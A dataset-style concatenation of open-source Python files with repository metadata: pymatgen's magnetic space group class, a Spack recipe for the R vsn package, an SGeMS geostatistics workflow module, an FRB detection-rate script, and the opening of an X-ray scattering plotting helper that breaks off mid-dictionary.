# Distributed under the terms of the MIT License.
"""
Magnetic space groups.
"""
import os
import sqlite3
import textwrap
from array import array
from fractions import Fraction
import numpy as np
from monty.design_patterns import cached_class
from pymatgen.core.operations import MagSymmOp
from pymatgen.electronic_structure.core import Magmom
from pymatgen.symmetry.groups import SymmetryGroup, in_array_list
from pymatgen.symmetry.settings import JonesFaithfulTransformation
from pymatgen.util.string import transformation_to_string
__author__ = "Matthew Horton, Shyue Ping Ong"
MAGSYMM_DATA = os.path.join(os.path.dirname(__file__), "symm_data_magnetic.sqlite")
@cached_class
class MagneticSpaceGroup(SymmetryGroup):
"""
Representation of a magnetic space group.
"""
def __init__(self, id, setting_transformation="a,b,c;0,0,0"):
"""
Initializes a MagneticSpaceGroup from its Belov, Neronova and
Smirnova (BNS) number supplied as a list or its label supplied
as a string. To create a magnetic structure in pymatgen, the
Structure.from_magnetic_spacegroup() method can be used, which
relies on this class.
The main difference between magnetic space groups and normal
crystallographic space groups is the inclusion of a time reversal
operator that acts on an atom's magnetic moment. This is
indicated by a prime symbol (') next to the respective symmetry
operation in its label, e.g. the standard crystallographic
space group Pnma has magnetic subgroups Pn'ma, Pnm'a, Pnma',
Pn'm'a, Pnm'a', Pn'ma', Pn'm'a'.
The magnetic space groups are classified as one of 4 types
where G = magnetic space group, and F = parent crystallographic
space group:
1. G=F no time reversal, i.e. the same as corresponding
crystallographic group
2. G=F+F1', "grey" groups, where avg. magnetic moment is zero,
e.g. a paramagnet in zero ext. mag. field
3. G=D+(F-D)1', where D is an equi-translation subgroup of F of
index 2, lattice translations do not include time reversal
4. G=D+(F-D)1', where D is an equi-class subgroup of F of index 2
There are two common settings for magnetic space groups, BNS
and OG. In case 4, the BNS setting != OG setting, and so a
transformation to go between the two settings is required:
specifically, the BNS setting is derived from D, and the OG
setting is derived from F.
This means that the OG setting refers to the unit cell if magnetic
order is neglected, and requires multiple unit cells to reproduce
the full crystal periodicity when magnetic moments are present.
This does not make the OG setting, in general, useful for
electronic structure calculations and the BNS setting is preferred.
However, this class does contain information on the OG setting and
can be initialized from OG labels or numbers if required.
Conventions: ITC monoclinic unique axis b, monoclinic cell choice 1,
hexagonal axis for trigonal groups, origin choice 2 for groups with
more than one origin choice (ISO-MAG).
Raw data comes from ISO-MAG, ISOTROPY Software Suite, iso.byu.edu
http://stokes.byu.edu/iso/magnetic_data.txt
with kind permission from Professor Branton Campbell, BYU
Data originally compiled from:
(1) Daniel B. Litvin, Magnetic Group Tables (International Union
of Crystallography, 2013) www.iucr.org/publ/978-0-9553602-2-0.
(2) C. J. Bradley and A. P. Cracknell, The Mathematical Theory of
Symmetry in Solids (Clarendon Press, Oxford, 1972).
See http://stokes.byu.edu/iso/magneticspacegroupshelp.php for more
information on magnetic symmetry.
:param id: BNS number supplied as list of 2 ints or BNS label as
str or index as int (1-1651) to iterate over all space groups"""
self._data = {}
# Datafile is stored as sqlite3 database since (a) it can be easily
# queried for various different indexes (BNS/OG number/labels) and (b)
# allows binary data to be stored in a compact form similar to that in
# the source data file, significantly reducing file size.
# Note that a human-readable JSON format was tested first but was 20x
# larger and required *much* longer initial loading times.
# retrieve raw data
db = sqlite3.connect(MAGSYMM_DATA)
c = db.cursor()
if isinstance(id, str):
id = "".join(id.split()) # remove any white space
c.execute("SELECT * FROM space_groups WHERE BNS_label=?;", (id,))
elif isinstance(id, list):
c.execute("SELECT * FROM space_groups WHERE BNS1=? AND BNS2=?;", (id[0], id[1]))
elif isinstance(id, int):
# OG3 index is a 'master' index, going from 1 to 1651
c.execute("SELECT * FROM space_groups WHERE OG3=?;", (id,))
raw_data = list(c.fetchone())
# Jones Faithful transformation
self.jf = JonesFaithfulTransformation.from_transformation_string("a,b,c;0,0,0")
if isinstance(setting_transformation, str):
if setting_transformation != "a,b,c;0,0,0":
self.jf = JonesFaithfulTransformation.from_transformation_string(setting_transformation)
elif isinstance(setting_transformation, JonesFaithfulTransformation):
if setting_transformation != self.jf:
self.jf = setting_transformation
self._data["magtype"] = raw_data[0] # int from 1 to 4
self._data["bns_number"] = [raw_data[1], raw_data[2]]
self._data["bns_label"] = raw_data[3]
self._data["og_number"] = [raw_data[4], raw_data[5], raw_data[6]]
self._data["og_label"] = raw_data[7] # can differ from BNS_label
def _get_point_operator(idx):
"""Retrieve information on point operator (rotation matrix and Seitz label)."""
hex = self._data["bns_number"][0] >= 143 and self._data["bns_number"][0] <= 194
c.execute(
"SELECT symbol, matrix FROM point_operators WHERE idx=? AND hex=?;",
(idx - 1, hex),
)
op = c.fetchone()
op = {
"symbol": op[0],
"matrix": np.array(op[1].split(","), dtype="f").reshape(3, 3),
}
return op
def _parse_operators(b):
"""Parses compact binary representation into list of MagSymmOps."""
if len(b) == 0: # e.g. if magtype != 4, OG setting == BNS setting, and b == [] for OG symmops
return None
raw_symops = [b[i : i + 6] for i in range(0, len(b), 6)]
symops = []
for r in raw_symops:
point_operator = _get_point_operator(r[0])
translation_vec = [r[1] / r[4], r[2] / r[4], r[3] / r[4]]
time_reversal = r[5]
op = MagSymmOp.from_rotation_and_translation_and_time_reversal(
rotation_matrix=point_operator["matrix"],
translation_vec=translation_vec,
time_reversal=time_reversal,
)
# store string representation, e.g. (2x|1/2,1/2,1/2)'
seitz = "({}|{},{},{})".format(
point_operator["symbol"],
Fraction(translation_vec[0]),
Fraction(translation_vec[1]),
Fraction(translation_vec[2]),
)
if time_reversal == -1:
seitz += "'"
symops.append({"op": op, "str": seitz})
return symops
def _parse_wyckoff(b):
"""Parses compact binary representation into list of Wyckoff sites."""
if len(b) == 0:
return None
wyckoff_sites = []
def get_label(idx):
if idx <= 25:
return chr(97 + idx) # returns a-z when idx 0-25
return "alpha" # when a-z labels exhausted, use alpha, only relevant for a few space groups
o = 0 # offset
n = 1 # nth Wyckoff site
num_wyckoff = b[0]
while len(wyckoff_sites) < num_wyckoff:
m = b[1 + o] # multiplicity
label = str(b[2 + o] * m) + get_label(num_wyckoff - n)
sites = []
for j in range(m):
s = b[3 + o + (j * 22) : 3 + o + (j * 22) + 22] # data corresponding to specific Wyckoff position
translation_vec = [s[0] / s[3], s[1] / s[3], s[2] / s[3]]
matrix = [
[s[4], s[7], s[10]],
[s[5], s[8], s[11]],
[s[6], s[9], s[12]],
]
matrix_magmom = [
[s[13], s[16], s[19]],
[s[14], s[17], s[20]],
[s[15], s[18], s[21]],
]
# store string representation, e.g. (x,y,z;mx,my,mz)
wyckoff_str = "({};{})".format(
transformation_to_string(matrix, translation_vec),
transformation_to_string(matrix_magmom, c="m"),
)
sites.append(
{
"translation_vec": translation_vec,
"matrix": matrix,
"matrix_magnetic": matrix_magmom,
"str": wyckoff_str,
}
)
# only keeping string representation of Wyckoff sites for now
# could do something else with these in future
wyckoff_sites.append({"label": label, "str": " ".join([s["str"] for s in sites])})
n += 1
o += m * 22 + 2
return wyckoff_sites
def _parse_lattice(b):
"""Parses compact binary representation into list of lattice vectors/centerings."""
if len(b) == 0:
return None
raw_lattice = [b[i : i + 4] for i in range(0, len(b), 4)]
lattice = []
for r in raw_lattice:
lattice.append(
{
"vector": [r[0] / r[3], r[1] / r[3], r[2] / r[3]],
"str": "({},{},{})+".format(
Fraction(r[0] / r[3]).limit_denominator(),
Fraction(r[1] / r[3]).limit_denominator(),
Fraction(r[2] / r[3]).limit_denominator(),
),
}
)
return lattice
def _parse_transformation(b):
"""Parses compact binary representation into transformation between OG and BNS settings."""
if len(b) == 0:
return None
# capital letters used here by convention,
# IUCr defines P and p specifically
P = [[b[0], b[3], b[6]], [b[1], b[4], b[7]], [b[2], b[5], b[8]]]
p = [b[9] / b[12], b[10] / b[12], b[11] / b[12]]
P = np.array(P).transpose()
P_string = transformation_to_string(P, components=("a", "b", "c"))
p_string = "{},{},{}".format(
Fraction(p[0]).limit_denominator(),
Fraction(p[1]).limit_denominator(),
Fraction(p[2]).limit_denominator(),
)
return P_string + ";" + p_string
for i in range(8, 15):
try:
raw_data[i] = array("b", raw_data[i]) # construct array from sql binary blobs
except Exception:
# array() behavior changed, need to explicitly convert buffer to str in earlier Python
raw_data[i] = array("b", str(raw_data[i]))
self._data["og_bns_transform"] = _parse_transformation(raw_data[8])
self._data["bns_operators"] = _parse_operators(raw_data[9])
self._data["bns_lattice"] = _parse_lattice(raw_data[10])
self._data["bns_wyckoff"] = _parse_wyckoff(raw_data[11])
self._data["og_operators"] = _parse_operators(raw_data[12])
self._data["og_lattice"] = _parse_lattice(raw_data[13])
self._data["og_wyckoff"] = _parse_wyckoff(raw_data[14])
db.close()
@classmethod
def from_og(cls, id):
"""
Initialize from Opechowski and Guccione (OG) label or number.
:param id: OG number supplied as list of 3 ints or
or OG label as str
:return:
"""
db = sqlite3.connect(MAGSYMM_DATA)
c = db.cursor()
if isinstance(id, str):
c.execute("SELECT BNS_label FROM space_groups WHERE OG_label=?", (id,))
elif isinstance(id, list):
c.execute(
"SELECT BNS_label FROM space_groups WHERE OG1=? and OG2=? and OG3=?",
(id[0], id[1], id[2]),
)
bns_label = c.fetchone()[0]
db.close()
return cls(bns_label)
def __eq__(self, other):
return self._data == other._data
@property
def crystal_system(self):
"""
:return: Crystal system, e.g., cubic, hexagonal, etc.
"""
i = self._data["bns_number"][0]
if i <= 2:
return "triclinic"
if i <= 15:
return "monoclinic"
if i <= 74:
return "orthorhombic"
if i <= 142:
return "tetragonal"
if i <= 167:
return "trigonal"
if i <= 194:
return "hexagonal"
return "cubic"
@property
def sg_symbol(self):
"""
:return: Space group symbol
"""
return self._data["bns_label"]
@property
def symmetry_ops(self):
"""
Retrieve magnetic symmetry operations of the space group.
:return: List of :class:`pymatgen.core.operations.MagSymmOp`
"""
ops = [op_data["op"] for op_data in self._data["bns_operators"]]
# add lattice centerings
centered_ops = []
lattice_vectors = [l["vector"] for l in self._data["bns_lattice"]]
for vec in lattice_vectors:
if not (np.array_equal(vec, [1, 0, 0]) or np.array_equal(vec, [0, 1, 0]) or np.array_equal(vec, [0, 0, 1])):
for op in ops:
new_vec = op.translation_vector + vec
new_op = MagSymmOp.from_rotation_and_translation_and_time_reversal(
op.rotation_matrix,
translation_vec=new_vec,
time_reversal=op.time_reversal,
)
centered_ops.append(new_op)
ops = ops + centered_ops
# apply jones faithful transformation
ops = [self.jf.transform_symmop(op) for op in ops]
return ops
def get_orbit(self, p, m, tol=1e-5):
"""
Returns the orbit for a point and its associated magnetic moment.
Args:
p: Point as a 3x1 array.
m: A magnetic moment, compatible with
:class:`pymatgen.electronic_structure.core.Magmom`
tol: Tolerance for determining if sites are the same. 1e-5 should
be sufficient for most purposes. Set to 0 for exact matching
(and also needed for symbolic orbits).
Returns:
(([array], [array])) Tuple of orbit for point and magnetic moments for orbit.
"""
orbit = []
orbit_magmoms = []
m = Magmom(m)
for o in self.symmetry_ops:
pp = o.operate(p)
pp = np.mod(np.round(pp, decimals=10), 1)
mm = o.operate_magmom(m)
if not in_array_list(orbit, pp, tol=tol):
orbit.append(pp)
orbit_magmoms.append(mm)
return orbit, orbit_magmoms
def is_compatible(self, lattice, tol=1e-5, angle_tol=5):
"""
Checks whether a particular lattice is compatible with the
*conventional* unit cell.
Args:
lattice (Lattice): A Lattice.
tol (float): The tolerance to check for equality of lengths.
angle_tol (float): The tolerance to check for equality of angles
in degrees.
"""
# function from pymatgen.symmetry.groups.SpaceGroup
abc = lattice.lengths
angles = lattice.angles
crys_system = self.crystal_system
def check(param, ref, tolerance):
return all(abs(i - j) < tolerance for i, j in zip(param, ref) if j is not None)
if crys_system == "cubic":
a = abc[0]
return check(abc, [a, a, a], tol) and check(angles, [90, 90, 90], angle_tol)
if crys_system == "hexagonal" or (crys_system == "trigonal" and self.sg_symbol.endswith("H")):
a = abc[0]
return check(abc, [a, a, None], tol) and check(angles, [90, 90, 120], angle_tol)
if crys_system == "trigonal":
a = abc[0]
return check(abc, [a, a, a], tol)
if crys_system == "tetragonal":
a = abc[0]
return check(abc, [a, a, None], tol) and check(angles, [90, 90, 90], angle_tol)
if crys_system == "orthorhombic":
return check(angles, [90, 90, 90], angle_tol)
if crys_system == "monoclinic":
return check(angles, [90, None, 90], angle_tol)
return True
def data_str(self, include_og=True):
"""
Get description of all data, including information for OG setting.
:return: str
"""
# __str__() omits information on OG setting to reduce confusion
# as to which set of symops are active, this property gives
# all stored data including OG setting
desc = {} # dictionary to hold description strings
description = ""
# parse data into strings
# indicate if non-standard setting specified
if self.jf != JonesFaithfulTransformation.from_transformation_string("a,b,c;0,0,0"):
description += "Non-standard setting: .....\n"
description += self.jf.__repr__()
description += "\n\nStandard setting information: \n"
desc["magtype"] = self._data["magtype"]
desc["bns_number"] = ".".join(map(str, self._data["bns_number"]))
desc["bns_label"] = self._data["bns_label"]
desc["og_id"] = (
"\t\tOG: " + ".".join(map(str, self._data["og_number"])) + " " + self._data["og_label"]
if include_og
else ""
)
desc["bns_operators"] = " ".join([op_data["str"] for op_data in self._data["bns_operators"]])
desc["bns_lattice"] = (
" ".join([lattice_data["str"] for lattice_data in self._data["bns_lattice"][3:]])
if len(self._data["bns_lattice"]) > 3
else ""
) # don't show (1,0,0)+ (0,1,0)+ (0,0,1)+
desc["bns_wyckoff"] = "\n".join(
[
textwrap.fill(
wyckoff_data["str"],
initial_indent=wyckoff_data["label"] + " ",
subsequent_indent=" " * len(wyckoff_data["label"] + " "),
break_long_words=False,
break_on_hyphens=False,
)
for wyckoff_data in self._data["bns_wyckoff"]
]
)
desc["og_bns_transformation"] = (
"OG-BNS Transform: ({})\n".format(self._data["og_bns_transform"])
if desc["magtype"] == 4 and include_og
else ""
)
bns_operators_prefix = "Operators{}: ".format(" (BNS)" if desc["magtype"] == 4 and include_og else "")
bns_wyckoff_prefix = "Wyckoff Positions{}: ".format(" (BNS)" if desc["magtype"] == 4 and include_og else "")
# apply textwrap on long lines
desc["bns_operators"] = textwrap.fill(
desc["bns_operators"],
initial_indent=bns_operators_prefix,
subsequent_indent=" " * len(bns_operators_prefix),
break_long_words=False,
break_on_hyphens=False,
)
description += (
"BNS: {d[bns_number]} {d[bns_label]}{d[og_id]}\n"
"{d[og_bns_transformation]}"
"{d[bns_operators]}\n"
"{bns_wyckoff_prefix}{d[bns_lattice]}\n"
"{d[bns_wyckoff]}"
).format(d=desc, bns_wyckoff_prefix=bns_wyckoff_prefix)
if desc["magtype"] == 4 and include_og:
desc["og_operators"] = " ".join([op_data["str"] for op_data in self._data["og_operators"]])
# include all lattice vectors because (1,0,0)+ (0,1,0)+ (0,0,1)+
# not always present in OG setting
desc["og_lattice"] = " ".join([lattice_data["str"] for lattice_data in self._data["og_lattice"]])
desc["og_wyckoff"] = "\n".join(
[
textwrap.fill(
wyckoff_data["str"],
initial_indent=wyckoff_data["label"] + " ",
subsequent_indent=" " * len(wyckoff_data["label"] + " "),
break_long_words=False,
break_on_hyphens=False,
)
for wyckoff_data in self._data["og_wyckoff"]
]
)
og_operators_prefix = "Operators (OG): "
# apply textwrap on long lines
desc["og_operators"] = textwrap.fill(
desc["og_operators"],
initial_indent=og_operators_prefix,
subsequent_indent=" " * len(og_operators_prefix),
break_long_words=False,
break_on_hyphens=False,
)
description += ("\n{d[og_operators]}\nWyckoff Positions (OG): {d[og_lattice]}\n" "{d[og_wyckoff]}").format(
d=desc
)
elif desc["magtype"] == 4:
description += "\nAlternative OG setting exists for this space group."
return description
def __str__(self):
"""
String representation of the space group, specifying the setting
of the space group, its magnetic symmetry operators and Wyckoff
positions.
:return: str
"""
return self.data_str(include_og=False)
def _write_all_magnetic_space_groups_to_file(filename):
"""
Write all magnetic space groups to a human-readable text file.
Should contain same information as text files provided by ISO-MAG.
:param filename:
:return:
"""
s = (
"Data parsed from raw data from:\n"
"ISO-MAG, ISOTROPY Software Suite, iso.byu.edu\n"
"http://stokes.byu.edu/iso/magnetic_data.txt\n"
"Used with kind permission from Professor Branton Campbell, BYU\n\n"
)
all_msgs = []
for i in range(1, 1652):
all_msgs.append(MagneticSpaceGroup(i))
for msg in all_msgs:
s += f"\n{msg.data_str()}\n\n--------\n"
with open(filename, "w") as f:
f.write(s)
|
vorwerkc/pymatgen
|
pymatgen/symmetry/maggroups.py
|
Python
|
mit
| 23,391
|
[
"CRYSTAL",
"pymatgen"
] |
729dd2ef2a6cc2371b131f378e7e00d05d4f7b50896ec82eb9324f852fe3f284
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RVsn(RPackage):
"""The package implements a method for normalising microarray intensities,
and works for single- and multiple-color arrays. It can also be used
for data from other technologies, as long as they have similar format.
The method uses a robust variant of the maximum-likelihood estimator
for an additive-multiplicative error model and affine calibration. The
model incorporates data calibration step (a.k.a. normalization), a
model for the dependence of the variance on the mean intensity and a
variance stabilizing data transformation. Differences between
transformed intensities are analogous to "normalized log-ratios".
However, in contrast to the latter, their variance is independent of
the mean, and they are usually more sensitive and specific in detecting
differential transcription."""
homepage = "https://www.bioconductor.org/packages/vsn/"
git = "https://git.bioconductor.org/packages/vsn.git"
version('3.44.0', commit='e54513fcdd07ccfb8094359e93cef145450f0ee0')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-affy', type=('build', 'run'))
depends_on('r-limma', type=('build', 'run'))
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-hexbin', type=('build', 'run'))
depends_on('r@3.4.0:3.4.9', when='@3.44.0')
|
mfherbst/spack
|
var/spack/repos/builtin/packages/r-vsn/package.py
|
Python
|
lgpl-2.1
| 2,698
|
[
"Bioconductor"
] |
524d884d30b2f8b4c2cc18b8ce84c992a6d9d79b09954fb7603cf10aab6bcc11
|
import os
from os import listdir
from os.path import isfile, join
import sys
import numpy as np
from enum import Enum
import xml.etree.ElementTree as ET
# Get absolute path of package_directory
package_directory = os.path.dirname(os.path.abspath(__file__)).replace('core','')
# Check if sgems is indeed installed
sgems_installed = 'sgems' in sys.modules
if sgems_installed is True:
import sgems
# Global enum for different distribution types
Uniform =1
LogNormal=2
Gaussian=3
class trans_parameter(object):
def __init__(self,param_type,param_ranges):
self._type = param_type
self._ranges = param_ranges
def get_type(self):
if self._type is Uniform:
return 'Uniform'
elif self._type is LogNormal:
return 'Log Normal'
elif self._type is Gaussian:
return 'Gaussian'
def get_param_1_name(self):
if self._type is Uniform:
return 'Unif_min_target'
elif self._type is LogNormal:
return 'LN_mean_target'
elif self._type is Gaussian:
return 'G_mean_target'
def get_param_2_name(self):
if self._type is Uniform:
return 'Unif_max_target'
elif self._type is LogNormal:
return 'LN_variance_target'
elif self._type is Gaussian:
return 'G_variance_target'
class geostat_algo(object):
def __init__(self,default_file_path):
self.default_tree = ET.parse(default_file_path)
self.current_tree = self.default_tree
self.current_root = self.current_tree.getroot()
self.algo_name = self.current_root.find('algorithm').get('name')
#print 'Read Default Values for Algo:',self.algo_name
def update_parameter(self,p_names,p_type,p_val):
# Check if tree contains p_name
p_node = self.current_root
# p_names is a list containing all the nodes we need to traverse
for p_name in p_names:
p_node_next = p_node.find(p_name)
# if the node is not found, need to add it in
if p_node_next is None:
p_node.append(ET.Element(p_name))
p_node_next = p_node.find(p_name)
p_node = p_node_next
if p_node is None:
#print 'Error: Algorithm does not have a parameter named:',p_name
return False
else:
p_node.set(p_type,p_val)
def get_parameter(self,p_names,p_type):
# Check if tree contains p_name
p_node = self.current_root
# p_names is a list containing all the nodes we need to traverse
for p_name in p_names:
p_node = p_node.find(p_name)
if p_node is None:
return None
return p_node.get(p_type)
def delete_parameter(self,p_names):
p_node = self.current_root
# p_names is a list containing all the nodes we need to traverse
for p_name in p_names:
p_node = p_node.find(p_name)
def get_output_names(self):
output_names = []
# for SGSIM/COSGSIM
output_name = self.get_parameter(['Property_Name'],'value')
if output_name is not None:
num_realizations = int(self.get_parameter(['Nb_Realizations'],'value'))
for i in range(0,num_realizations):
output_names.append(output_name + '__real' + str(i))
return output_names
# for Tetris
output_name = self.get_parameter(['Property'],'value')
if output_name is not None:
num_realizations = int(self.get_parameter(['Nb_Realizations'],'value'))
for i in range(0,num_realizations):
output_names.append(output_name + '__real' + str(i))
return output_names
# for histogram transforms
output_name = self.get_parameter(['props'],'value')
if output_name is not None:
output_props = output_name.split(';')
output_suffix = self.get_parameter(['out_suffix'],'value')
for prop in output_props:
output_names.append(prop + output_suffix )
return output_names
def execute(self):
# Generate command string
execute_cmd = 'RunGeostatAlgorithm ' + self.algo_name + \
'::/GeostatParamUtils/XML::' + self.to_str()
return self.get_output_names(),execute_cmd
def to_str(self):
self.xmlstr = ET.tostring(self.current_root, method='xml')
return self.xmlstr
def reset(self):
self.current_tree = self.default_tree
self.current_root = self.current_tree.getroot()
class sgems_workflow(object):
def __init__(self,output_dir,grid_name,grid_size,num_real):
# Get all default algorithms
self.available_algo = dict()
default_files = [f for f in listdir(package_directory + 'data') \
if isfile(join(package_directory+'data', f))]
self.script = ''
self.output_dir = output_dir
self.grid_name = grid_name
self.grid_size = grid_size
self.num_real = num_real
# Make sure output directories exist
if not os.path.exists(output_dir):
print output_dir,'does not exist'
os.makedirs(output_dir)
# Folder where depositional properties are stored
self.prop_dir = output_dir +'Properties\\'
# Folder where facies maps are stored
self.facies_dir = output_dir + 'Facies\\'
# make directories
for path in [self.prop_dir,self.facies_dir]:
if not os.path.exists(path):
os.makedirs(path)
for algos in default_files:
if 'default.xml' in algos:
algo_name = algos.replace('_default.xml','')
self.available_algo[algo_name]=geostat_algo(package_directory+\
'data/'+algos)
def create_grid(self,name,dim_size,cell_size=[1,1,1],origin=[0,0,0]):
dim_str = "::".join([str(dim) for dim in dim_size])
cell_str = "::".join([str(cell) for cell in cell_size])
origin_str = "::".join([str(val) for val in origin])
outputstr = "::".join([name,dim_str,cell_str,origin_str])
cmd = 'NewCartesianGrid ' + outputstr + '\n\n'
self.script += cmd
if sgems_installed is True:
sgems.execute(cmd)
def save_grid(self,grid_name,obj_name,output_name):
cmd = 'SaveGeostatGrid ' + '::'.join([grid_name,self.output_dir+'\\'+
output_name,'gslib','0',obj_name])
self.script += cmd + '\n\n'
if sgems_installed is True:
sgems.execute(cmd)
def save_obj(self,grid_name,obj_names):
for facies, reals in obj_names.iteritems():
for real in reals:
output_path = 'Properties\\'+real
self.save_grid(grid_name,real,output_path)
def run_geostat_algo(self,algo_name):
output_names, cmd = self.available_algo[algo_name].execute()
self.script += cmd + '\n\n'
# If we are running inside a sgems session
if sgems_installed is True:
sgems.execute(cmd)
if len(output_names) is 1:
return output_names[0]
else:
return output_names
def histogram_transf(self,input_names,trans_param):
# Part 2: Transform clay to Gaussian
self.available_algo['trans'].reset()
self.available_algo['trans'].update_parameter(['grid'],\
'value',self.grid_name)
self.available_algo['trans'].update_parameter(['props'],\
'count',str(self.num_real))
self.available_algo['trans'].update_parameter(\
['Use_break_tie_index'],'value','0')
self.available_algo['trans'].update_parameter(\
['ref_type_target'],'value',trans_param.get_type())
self.available_algo['trans'].update_parameter(\
[trans_param.get_param_1_name()],'value',\
str(trans_param._ranges[0]))
self.available_algo['trans'].update_parameter(\
[trans_param.get_param_2_name()],'value',\
str(trans_param._ranges[1]))
self.available_algo['trans'].update_parameter(\
['props'],'value',';'.join(input_names))
output_names = self.run_geostat_algo(\
'trans')
# Names of realizations after transformation
if type(output_names) is str:
output_names = [output_names]
return output_names
def delete_grid(self,name):
pass
def execute(self):
pass
class python_workflow(object):
def __init__(self,output_dir,grid_name,grid_size):
self.output_dir = output_dir
self.grid_name = grid_name
self.grid_size = grid_size
def read_sgems_files(self,file_name):
num_header_lines = 3
raw_input = np.genfromtxt(file_name,skip_header=num_header_lines)
return raw_input
|
lewisli/gemsflowpy
|
core/workflow.py
|
Python
|
mit
| 9,477
|
[
"Gaussian"
] |
b017eae1abb63baa416d1ed85f58275cf29a94efe240c0c5b9fd19edff043963
|
"""Calculate the expected detection rates for apertif."""
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
from frbpoppy import CosmicPopulation, Survey, SurveyPopulation, hist
from tests.convenience import plot_aa_style, rel_path
from alpha_real import EXPECTED, poisson_interval
N_DAYS = 1 # Not used in eventual result
SCALE_TO = 'parkes-htru'
pop = CosmicPopulation.complex(n_srcs=1e5, n_days=N_DAYS)
pop.generate()
apertif = Survey('wsrt-apertif', n_days=N_DAYS)
apertif.set_beam(model='apertif_real')
if SCALE_TO == 'parkes-htru':
htru = Survey('parkes-htru', n_days=N_DAYS)
htru.set_beam(model='parkes')
if SCALE_TO == 'askap':
askap = Survey('askap-fly', n_days=N_DAYS)
askap.set_beam(model='gaussian', n_sidelobes=0.5)
days_per_frbs = []
for i in tqdm(range(2000), desc='Survey Run'):
apertif_pop = SurveyPopulation(pop, apertif, mute=True)
if SCALE_TO == 'parkes-htru':
htru_pop = SurveyPopulation(pop, htru, mute=True)
n_frbs_htru = EXPECTED['parkes-htru'][0]
n_days_htru = EXPECTED['parkes-htru'][1]
scaled_n_days = n_days_htru*(htru_pop.source_rate.det / n_frbs_htru)
if SCALE_TO == 'askap':
askap_pop = SurveyPopulation(pop, askap, mute=True)
n_frbs_askap = EXPECTED['askap-fly'][0]
n_days_askap = EXPECTED['askap-fly'][1]
scaled_n_days = n_days_askap*(askap_pop.source_rate.det / n_frbs_askap)
days_per_frb = scaled_n_days / apertif_pop.source_rate.det
# print(f'{days_per_frb} days per frb')
days_per_frbs.append(days_per_frb)
days_per_frbs = np.array(days_per_frbs)
mean = np.mean(days_per_frbs)
std = np.std(days_per_frbs)
poisson_std = poisson_interval(mean)
print(f'Mean rate for apertif is {mean}')
print(f'Standard deviation of {std}')
# Plot
rates, values = hist(days_per_frbs, bin_type='lin')
plot_aa_style()
plt.step(rates, values, where='mid')
plt.xlabel(f'Apertif days per burst scaled to {SCALE_TO}')
plt.savefig(rel_path('./plots/rate_apertif_dist.pdf'))
|
davidgardenier/frbpoppy
|
tests/rates/apertif_dist.py
|
Python
|
mit
| 2,026
|
[
"Gaussian"
] |
b4480d6c0d382af25a74b14cf544eba7c5acf0f2e1e22c40587f57a98b39cbe3
|
import numpy as num
import numpy as np
from matplotlib import pyplot
import matplotlib as mpt
import pickle,glob
import sys,os,inspect
from matplotlib import rc
from matplotlib import pyplot
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from color_mate import color_combine_mate as set_color
def local_func():
return None
def module_path_locator(func=local_func):
return os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(inspect.getsourcefile(func)))),'dump_files')
"""
functions to make plots of CTR, RAXR, Electron Density using the dumped files created in GenX script (running_mode=False)
Formates for each kind of dumped files
1. CTR_dumped file:[experiment_data,model],both items in the list is a library of form {'HKL':[L,I,eI]} and {'HKL':[L,I]},respecitvely.
2. RAXR_dumped file: [experiment_data,model],both items in the list is a library of form {'HKL':[E,I,eI]} and {'HKL':[E,I]},respecitvely.
3. e_density_dumped file (model): [e_data, labels], where e_data=[[z,ed1],[z,ed2]...[z,ed_total]],labels=['Domain1A','Domain2A',...,'Total']
4. e_density_dumped file (imaging): [z_plot,eden_plot,eden_domains], where
z_plot is a list [z1,z2,z3,...,zn]
eden_plot is a list of [ed1,ed2,...,edn], which is the total e density for all domains
eden_domains=[[ed_z1_D1,ed_z1_D2,...,ed_z1_Dm],[ed_z2_D1,ed_z2_D2,...,ed_z2_Dm],...,[ed_zn_D1,ed_zn_D2,...,ed_zn_Dm]] considering m domains
"""
#calcualte the error for pb complex structure
def output_errors(edge_length=2.7,top_angle=70,error_top_angle=1,error_theta=1,error_delta1=0.02,error_delta2=0.03):
sin_alpha_left=np.sin(np.deg2rad(top_angle-error_top_angle)/2.)
sin_alpha_right=np.sin(np.deg2rad(top_angle+error_top_angle)/2.)
tan_alpha_left=np.tan(np.deg2rad(top_angle-error_top_angle)/2.)
tan_alpha_right=np.tan(np.deg2rad(top_angle+error_top_angle)/2.)
print 'error of PbO1 bond length:',edge_length/4.*(1./sin_alpha_left-1./sin_alpha_right)+error_delta1
print 'error of pbO2 bond length:',edge_length/4.*(1./sin_alpha_left-1./sin_alpha_right)
print 'error of PbOdistal bond length:',edge_length/4.*(1./sin_alpha_left-1./sin_alpha_right)++error_delta2
print 'error of O1PbO2 bond angle:',error_top_angle
print 'error of O1PbOdistal and O2PbOdistal bond angle:',error_top_angle+error_theta
print 'error of PbFe seperation:',edge_length/4.*(1./tan_alpha_left-1./tan_alpha_right)
return None
bl_dl_muscovite_old={'3_0':{'segment':[[0,1],[1,9]],'info':[[2,1],[6,1]]},'2_0':{'segment':[[0,9]],'info':[[2,2.0]]},'2_1':{'segment':[[0,9]],'info':[[4,0.8609]]},'2_2':{'segment':[[0,9]],'info':[[2,1.7218]]},\
'2_-1':{'segment':[[0,3.1391],[3.1391,9]],'info':[[4,3.1391],[2,3.1391]]},'1_1':{'segment':[[0,9]],'info':[[2,1.8609]]},'1_0':{'segment':[[0,3],[3,9]],'info':[[6,3],[2,3]]},'0_2':{'segment':[[0,9]],'info':[[2,1.7218]]},\
